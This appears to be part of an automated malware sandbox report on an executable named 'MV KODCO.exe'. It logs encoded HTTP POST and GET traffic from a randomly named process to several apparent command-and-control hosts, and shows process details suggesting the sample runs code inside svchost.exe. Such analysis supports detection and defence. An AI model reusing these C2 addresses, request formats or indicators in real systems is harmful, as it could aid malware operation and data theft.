                                                        Data Raw: 31 48 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 57 6f 6e 7a 79 34 70 58 46 54 44 36 6f 41 4a 56 4c 44 58 6d 45 33 61 2b 4d 75 53 68 69 72 35 45 63 63 4d 71 71 52 6f 4c 78 47 6a 74 6f 49 73 36 69 50 77 58 36 46 7a 72 4f 55 44 6e 67 72 72 6d 51 45 62 77 53 51 62 57 65 35 65 35 6e 5a 6c 35 42 63 62 61 42 47 4a 54 37 73 31 6a 4d 49 69 73 42 4f 6a 58 41 59 77 35 58 2b 63 50 39 50 62 79 32 73 6b 34 65 78 53 58 48 37 48 46 2f 77 42 65 6c 4f 78 52 35 4b 44 2f 6c 77 2b 73 46 75 56 2b 6b 6b 4b 6c 38 61 69 50 61 49 66 73 33 76 78 5a 4b 78 75 70 46 56 57 43 67 62 67 4d 30 69 47 78 56 44 53 6b 77 61 37 54 6b 34 4f 66 57 31 73 46 4d 50 69 34 50 6f 72 66 37 4d 41 4e 36 62 67 44 4b 4d 67 52 5a 57 70 37 73 66 6b 33 55 71 42 57 58 46 69 75 31 41 70 68 73 37 45 51 6d 2b 52 4a 7a 72 67 67 76 45 78 4d 32 36 2f 41 67 6d 64 50 32 6b 48 75 6e 44 68 74 78 66 6f 59 57 30 47 2f 63 67 33 42 66 6c 69 47 30 7a 74 37 64 47 58 48 65 41 43 63 54 [TRUNCATED]
                                                        Data Ascii: 1H=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhvWonzy4pXFTD6oAJVLDXmE3a+MuShir5EccMqqRoLxGjtoIs6iPwX6FzrOUDngrrmQEbwSQbWe5e5nZl5BcbaBGJT7s1jMIisBOjXAYw5X+cP9Pby2sk4exSXH7HF/wBelOxR5KD/lw+sFuV+kkKl8aiPaIfs3vxZKxupFVWCgbgM0iGxVDSkwa7Tk4OfW1sFMPi4Porf7MAN6bgDKMgRZWp7sfk3UqBWXFiu1Aphs7EQm+RJzrggvExM26/AgmdP2kHunDhtxfoYW0G/cg3BfliG0zt7dGXHeACcTOvzpfGgY8pRVGavZvf8C2sD3Dl9oXwfO6daqRVmZsi3SUtQV80cc9Wwhv2xu9+xLEGDJFk2RbQQPr67nI3PdY/4Q/jIe1K7g8ZBMmWY4FwU5akpaKHDvlkVLlsd+uPVqTb+odppOAObFki7feBqDBXzUozWTu7KW9wMrliT7f6CTPRj6x2H7YaQ8vqDOhYclbbdFJVkXRTjwzj2U78Jq67Rb/3mFFlr60aQUPqw1pi3IfULb0TxdLJwxGxZED2vCj2Zvc0ETPO9KGPmJHdZLnBXK+KWW2iuXT1Tj44GkwmZCnS7k3ikSRSqA/Ms+jPH9BrTMTfGaChp6N5VOaCY+nCKYDvkNeY4AmeFOznQ0PPI4s2CgCBD3Y8/iGHxuhrzecCefeRW7eBgFtLlX6dQBOXJ04eIUfJS80ybppS6NXv0iyScCLZ+X3R5FO8z6rIuKS5kb0UMOYxOl6YM3pKxJ/9oiUCw/if/Yu/w36EGd1/hClIc5SmhJrIo5IZCSsS38xfulo2mbctqSvIMzIqE7mt+WJV/KI8vCeBbumyFIFah39fly1EpGtGzGjXBoMAdnHMfD92jFDuKxtq5/tAuEECmmSc3De4Pl5B+4m7hftXIut/PsBXMVxxqHHb2d8q4+BwgCiJCpfwnf6CMIJZZZGXZhcStQ3tbUtv [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.4499153.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:34.160284996 CET535OUTGET /slxp/?1H=QrWs1MGbYyQFoq3udSaW2R0wE8dP0+vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs/0Bo4314wmW6buSFT8Qs1kQOmXTHHnWTO0=&jD=VzTtTZ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.schedulemassage.xyz
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.4499423.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:39.986674070 CET801OUTPOST /0598/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mcfunding.org
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 199
                                                        Cache-Control: no-cache
                                                        Origin: http://www.mcfunding.org
                                                        Referer: http://www.mcfunding.org/0598/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 4a 61 35 5a 30 6f 6d 6e 72 43 53 4a 78 65 5a 58 72 43 49 4e 65 6b 76 44 6a 6b 56 6e 35 4c 58 73 4b 58 4f 61 49 54 63 58 44 71 76 66 6a 4a 71 42 71 6e 7a 37 59 4a 4d 65 69 32 41 30 72 53 6f 72 65 46 2f 75 48 62 49 66 64 66 76 69 42 33 4f 54 50 64 64 71 78 31 2f 4a 6b 32 76 5a 46 64 6a 33 6a 67 76 37 45 74 33 52 6d 30 77 71 48 79 77 56 57 6b 70 6a 64 6c 48 42 57 51 72 41 52 51 52 69 77 2f 38 33 4b 6e 78 37 42 32 6e 48 72 34 62 38 31 30 67 76 6f 49 71 6d 6d 2b 4f 69 61 45 62 57 43 43 77 46 39 30 4d 79 79 6a 77 63 59 52 39 79 34 59 63 43 67 3d 3d
                                                        Data Ascii: 1H=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gvoIqmm+OiaEbWCCwF90MyyjwcYR9y4YcCg==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.4499553.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:42.530179977 CET821OUTPOST /0598/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mcfunding.org
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 219
                                                        Cache-Control: no-cache
                                                        Origin: http://www.mcfunding.org
                                                        Referer: http://www.mcfunding.org/0598/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 2f 58 69 49 2f 4f 62 4b 37 63 51 44 71 76 51 44 4a 7a 46 71 6d 65 37 5a 30 6d 65 6a 61 41 30 72 47 6f 72 63 74 2f 70 30 44 4c 5a 4e 66 74 76 68 33 49 51 2f 64 64 71 78 31 2f 4a 67 66 79 5a 46 56 6a 33 54 51 76 35 6c 74 30 63 47 30 33 70 48 79 77 43 47 6b 74 6a 64 6c 78 42 54 78 41 41 54 6f 52 69 78 76 38 33 62 6e 32 77 42 32 68 44 72 34 4c 78 58 6b 77 76 59 49 69 67 41 36 68 6e 49 41 55 58 45 50 71 55 4d 56 62 67 79 48 44 42 66 59 4a 2f 37 6c 56 5a 6e 43 71 4c 71 7a 58 62 75 66 6f 53 58 41 6b 58 44 30 42 2b 67 77 3d
                                                        Data Ascii: 1H=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyHDBfYJ/7lVZnCqLqzXbufoSXAkXD0B+gw=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.4499673.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:45.076742887 CET10903OUTPOST /0598/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mcfunding.org
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 10299
                                                        Cache-Control: no-cache
                                                        Origin: http://www.mcfunding.org
                                                        Referer: http://www.mcfunding.org/0598/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 6e 58 69 35 66 4f 61 72 37 63 52 44 71 76 5a 6a 4a 32 46 71 6d 6d 37 59 63 69 65 6a 47 51 30 70 2b 6f 71 2f 56 2f 6f 46 44 4c 58 4e 66 74 7a 52 33 4a 54 50 64 4d 71 78 6c 7a 4a 6b 44 79 5a 46 56 6a 33 56 55 76 33 6b 74 30 65 47 30 77 71 48 79 73 56 57 6c 34 6a 64 64 68 42 54 38 37 41 69 49 52 69 51 66 38 34 4a 50 32 79 68 32 6a 4f 4c 35 55 78 58 70 33 76 59 46 5a 67 41 6d 4c 6e 4b 63 55 58 43 2b 4a 4b 63 56 30 78 43 62 53 5a 73 4d 43 2f 35 41 55 53 56 69 30 4c 61 66 50 49 76 37 44 56 30 39 2b 4c 57 59 69 67 6c 31 57 43 49 69 41 52 42 76 65 68 59 75 5a 48 7a 57 49 53 6a 6a 32 76 71 74 44 39 69 78 57 49 55 32 34 69 74 55 32 4c 6d 36 6b 31 74 41 73 71 6f 61 7a 4d 55 5a 74 56 6f 75 34 76 46 65 42 72 77 47 74 6f 54 45 33 73 78 42 64 75 64 45 73 39 79 66 41 50 48 79 6d 42 35 52 55 6e 64 48 42 48 4f 69 35 2f 50 47 4c 72 58 6b 62 67 2b 75 49 56 6c 6e 52 45 6a 6e 55 64 39 30 [TRUNCATED]
                                                        Data Ascii: 1H=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkKnXi5fOar7cRDqvZjJ2Fqmm7YciejGQ0p+oq/V/oFDLXNftzR3JTPdMqxlzJkDyZFVj3VUv3kt0eG0wqHysVWl4jddhBT87AiIRiQf84JP2yh2jOL5UxXp3vYFZgAmLnKcUXC+JKcV0xCbSZsMC/5AUSVi0LafPIv7DV09+LWYigl1WCIiARBvehYuZHzWISjj2vqtD9ixWIU24itU2Lm6k1tAsqoazMUZtVou4vFeBrwGtoTE3sxBdudEs9yfAPHymB5RUndHBHOi5/PGLrXkbg+uIVlnREjnUd90t7SocgxdmqW/Sw/rowS8lnd+/G6ZuyKFIRYuvCzH7ydVs8FsThnr+1BIPfwcumU3bnVl7JRgRLUT2EuuR3m4SR9HIGkUP6dWGYxn7W8N7Q7YneYOZ/37+8fwOjOubaIdCKz+yaSY1eL4FpVM/tRyi9gwXa4stEZEixrAfW+YPn7IMsceEcHrHVWJAk/Y5zc0/QGZH0apLxh8eVnVpxKE9NrRd9M/aDereMII0+rh3kvgh2ujvjPryKjtCJrae+yskyoBnQdiyQU6REkebAzCz2RA/MR1Y1XBjDmsloXZmR9dpXSTebopdlEryiCiWojE/5okAL5zdoYX2mDGTJvucjTZKb/Jvd5TWX4dLSBWhudGkQRraretqX5m143PVEPULQVa7JRj6vjdkJ2jtvtPZ6+weVcHIIpj9Os5JPRZHnQbOpvHPHEhT5h4337gCgkMWBbLBLpjQOgi2LX8eroZhrlbspEHRUirE4emdlD1yvlYc+R5IpK3yoAI1dEQiO0oen2XfY8InvqmWWvxqXoWwVIwdrQ5Ev/rDIXPbC+BvLX6NeQEIs+tQQ+dcEBzQ/+uDP57ZnY69+D5ylfPNPoxSWDxtj7DDKXl7tIzpYkgBbG2E1k87zYqPcbZ32OpW2GIUhMlUxMHLIBj6EKZFbgKKrsPrL/RblUdik [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.4499793.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:47.621228933 CET529OUTGET /0598/?1H=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&jD=VzTtTZ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mcfunding.org
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.450008198.252.98.54802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:53.482558966 CET813OUTPOST /y3dc/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.migorengya8.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 199
                                                        Cache-Control: no-cache
                                                        Origin: http://www.migorengya8.click
                                                        Referer: http://www.migorengya8.click/y3dc/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 69 77 4d 7a 34 58 74 7a 71 46 51 54 68 36 69 76 77 6b 4a 38 68 4b 46 36 30 33 42 51 33 6e 4b 4b 2b 4d 6f 70 38 55 42 71 4f 70 70 63 66 33 76 70 61 47 72 52 4e 31 6e 63 69 44 38 6b 53 46 39 39 63 4d 62 42 2b 4d 70 4d 66 54 6a 70 79 2b 35 6d 36 52 6f 78 41 76 38 71 6e 44 6a 47 61 34 78 68 48 51 71 51 32 65 35 42 62 49 39 38 30 30 49 52 51 37 30 69 31 49 50 4d 2f 4a 66 32 45 35 4b 63 4d 75 73 49 68 52 4d 32 56 56 62 4d 4b 70 51 71 65 53 37 43 4e 4c 50 47 72 42 58 45 6d 57 42 4d 59 64 38 31 44 62 47 2f 57 7a 6d 67 6c 48 46 34 41 61 46 54 32 77 3d 3d
                                                        Data Ascii: 1H=vjjmaXWtymtuiwMz4XtzqFQTh6ivwkJ8hKF603BQ3nKK+Mop8UBqOppcf3vpaGrRN1nciD8kSF99cMbB+MpMfTjpy+5m6RoxAv8qnDjGa4xhHQqQ2e5BbI9800IRQ70i1IPM/Jf2E5KcMusIhRM2VVbMKpQqeS7CNLPGrBXEmWBMYd81DbG/WzmglHF4AaFT2w==
                                                        Nov 19, 2024 03:25:54.221441031 CET1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Tue, 19 Nov 2024 02:25:54 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.450019198.252.98.54802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:56.072985888 CET833OUTPOST /y3dc/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.migorengya8.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 219
                                                        Cache-Control: no-cache
                                                        Origin: http://www.migorengya8.click
                                                        Referer: http://www.migorengya8.click/y3dc/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 69 4b 39 74 59 70 75 46 42 71 65 35 70 63 4b 48 75 6a 56 6d 72 67 4e 31 71 6a 69 44 41 6b 53 46 70 39 63 4e 72 42 2b 2f 42 50 66 44 6a 72 2b 65 35 67 30 78 6f 78 41 76 38 71 6e 44 33 6f 61 34 35 68 48 67 61 51 6b 50 35 4f 57 6f 39 2f 6b 45 49 52 44 72 30 6d 31 49 4f 6a 2f 49 43 6a 45 2f 47 63 4d 72 41 49 69 44 30 70 63 56 62 4b 4f 70 52 72 52 78 4b 30 4c 71 6d 4d 70 44 57 67 37 48 74 38 51 37 78 76 53 71 6e 6f 45 7a 43 54 34 41 4d 4d 4e 5a 34 61 74 38 30 6f 39 79 78 44 65 43 42 50 39 77 70 61 71 36 35 76 65 63 45 3d
                                                        Data Ascii: 1H=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RiK9tYpuFBqe5pcKHujVmrgN1qjiDAkSFp9cNrB+/BPfDjr+e5g0xoxAv8qnD3oa45hHgaQkP5OWo9/kEIRDr0m1IOj/ICjE/GcMrAIiD0pcVbKOpRrRxK0LqmMpDWg7Ht8Q7xvSqnoEzCT4AMMNZ4at80o9yxDeCBP9wpaq65vecE=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.450027198.252.98.54802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:58.658467054 CET10915OUTPOST /y3dc/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.migorengya8.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 10299
                                                        Cache-Control: no-cache
                                                        Origin: http://www.migorengya8.click
                                                        Referer: http://www.migorengya8.click/y3dc/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 61 4b 2b 65 41 70 38 79 39 71 64 35 70 63 57 58 75 67 56 6d 72 39 4e 31 79 76 69 44 4d 65 53 48 52 39 63 76 6a 42 33 75 42 50 4d 6a 6a 72 6a 4f 35 68 36 52 6f 42 41 76 73 75 6e 44 6e 6f 61 34 35 68 48 69 43 51 6e 65 35 4f 46 34 39 38 30 30 49 56 51 37 30 65 31 49 6d 5a 2f 49 47 7a 48 50 6d 63 4d 4b 73 49 75 57 59 70 45 46 62 49 4a 70 51 34 52 78 47 6e 4c 71 36 75 70 43 7a 46 37 45 78 38 56 75 49 75 41 50 48 53 61 77 36 65 37 67 34 4c 45 4c 6b 4c 74 66 6f 7a 74 48 73 66 64 44 31 63 2f 68 41 74 36 37 6f 70 64 62 78 44 53 50 63 79 76 74 58 43 7a 36 7a 4c 76 47 7a 69 72 6e 36 6d 63 7a 49 70 6e 59 5a 70 31 68 34 48 48 50 57 30 49 4d 30 30 46 59 36 68 6f 4c 55 6c 6b 4f 71 6d 62 31 48 51 51 68 62 43 61 38 53 45 69 77 45 2f 55 6c 70 46 63 2f 59 79 58 4c 45 6b 41 67 6e 6f 36 62 47 4a 4e 57 7a 6f 79 38 6e 6c 74 7a 49 4a 49 4f 4d 6d 4e 2b 41 6d 72 66 49 53 63 62 48 4e 6a 31 53 [TRUNCATED]
                                                        Data Ascii: 1H=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RaK+eAp8y9qd5pcWXugVmr9N1yviDMeSHR9cvjB3uBPMjjrjO5h6RoBAvsunDnoa45hHiCQne5OF49800IVQ70e1ImZ/IGzHPmcMKsIuWYpEFbIJpQ4RxGnLq6upCzF7Ex8VuIuAPHSaw6e7g4LELkLtfoztHsfdD1c/hAt67opdbxDSPcyvtXCz6zLvGzirn6mczIpnYZp1h4HHPW0IM00FY6hoLUlkOqmb1HQQhbCa8SEiwE/UlpFc/YyXLEkAgno6bGJNWzoy8nltzIJIOMmN+AmrfIScbHNj1SsSu8/DV3LokIKxyXYM0pAhn19yipfkNMG76EygWJyXGs69QDNOCJv5C5Td1hUAIUyPOD3+Tiizb/wzxYh7t89iq9AyWRKRIDTXxWPZ3tI1uKgPeM7wF4JZwURnfHknItAaLs/v2sIOgB3/Xtooj1AUVI3muo4JzCDsAbuM5xN5Uqji02VYAQyMzPblNHXOlyBSkFFWTr2BL5Q+H7mmoOnogJmR3pRivoOSE+QCIq4ApOxLeKFmL+WCm6rehfpDCyfUPoKvd4JA7O+Qt/1jmy7lTqYcN4yqHp65RwAbkwaUnbexE3kJK3XDxDrYmrb4D5vbyoQ8I6u9lJcfNGPbZv/iFZ64QxN9ofMTR1UDx0rDAj2K02swPYkqw6xs2H4igdkhFouUHal29vvNI5V7lOv0sXhqe2z0Pa+qHWThdUpcLXGNYHTWNdGhzMm5i5p6QvlWSvnAl4SrzJ3MaWM3noLw0CElMvKjofH61JAth36doCCG8szZ4Io7/BIDO96E+f8qTTehwQXISjRRHGXd4jO8Jk8AxhbLaRgUI+i0U31d4iPfnOGRFjKSl0q+uYAPn4CFSytQommTSRNrZJR3tUeAcimJD9Q843sYbIO+pwXdIdztjxSlT37a6/JhjeQXVhbPACBJPEcUMl09zyOwsEsHaNFfG4HO2vUo [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.450028198.252.98.54802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:26:01.199599028 CET533OUTGET /y3dc/?1H=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&jD=VzTtTZ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.migorengya8.click
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:21:24:00
                                                        Start date:18/11/2024
                                                        Path:C:\Users\user\Desktop\MV KODCO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\MV KODCO.exe"
                                                        Imagebase:0x5e0000
                                                        File size:1'214'976 bytes
                                                        MD5 hash:864EEB9F741F971EF200951018A042A2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:21:24:01
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\MV KODCO.exe"
                                                        Imagebase:0xa20000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
